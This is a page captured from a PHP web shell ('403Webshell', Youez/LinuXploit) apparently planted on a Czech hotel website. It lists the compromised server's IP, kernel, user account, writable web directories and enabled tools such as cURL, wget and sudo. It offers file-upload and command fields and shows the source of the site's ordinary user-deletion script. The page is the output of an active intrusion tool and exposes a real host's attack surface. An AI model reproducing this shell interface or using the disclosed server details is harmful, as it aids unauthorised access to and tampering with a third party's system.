403Webshell
Server IP : 193.86.120.172  /  Your IP : 216.73.216.215
Web Server : Apache/2.4.63 (Unix)
System : Linux JServices 3.10.108 #86003 SMP Wed Oct 22 13:20:46 CST 2025 x86_64
User : kubec ( 1026)
PHP Version : 8.2.28
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /volume1/web/hotellesnizatisi_cz/new/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /volume1/web/hotellesnizatisi_cz/new/uzivatele-smazat.php
<?php
require_once __DIR__ . '/includes/auth.php';
$user = require_role(['admin', 'manazer']);
require_once __DIR__ . '/includes/layout.php';

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    header('Location: uzivatele.php');
    exit;
}

$id = (int) ($_POST['id'] ?? 0);

if ($id === (int) $user['id']) {
    set_flash('error', 'Nemůžete smazat sám sebe.');
    header('Location: uzivatele.php');
    exit;
}

$stmt = db()->prepare('SELECT * FROM uzivatele WHERE id = ?');
$stmt->execute([$id]);
$cilovy = $stmt->fetch();

if (!$cilovy) {
    set_flash('error', 'Uživatel nebyl nalezen.');
    header('Location: uzivatele.php');
    exit;
}

if ($user['role'] === 'manazer' && $cilovy['role'] !== 'zamestnanec') {
    http_response_code(403);
    die('Nemáte oprávnění smazat tento účet.');
}

try {
    db()->prepare('DELETE FROM uzivatel_session WHERE uzivatel_id = ?')->execute([$id]);
    db()->prepare('DELETE FROM uzivatele_opravneni WHERE uzivatel_id = ?')->execute([$id]);
    db()->prepare('DELETE FROM uzivatele WHERE id = ?')->execute([$id]);
    set_flash('success', 'Uživatel „' . $cilovy['jmeno'] . ' ' . $cilovy['prijmeni'] . '“ byl smazán.');
} catch (PDOException $e) {
    set_flash('error', 'Uživatele se nepodařilo smazat.');
}

header('Location: uzivatele.php');
exit;

Youez - 2016 - github.com/yon3zu
LinuXploit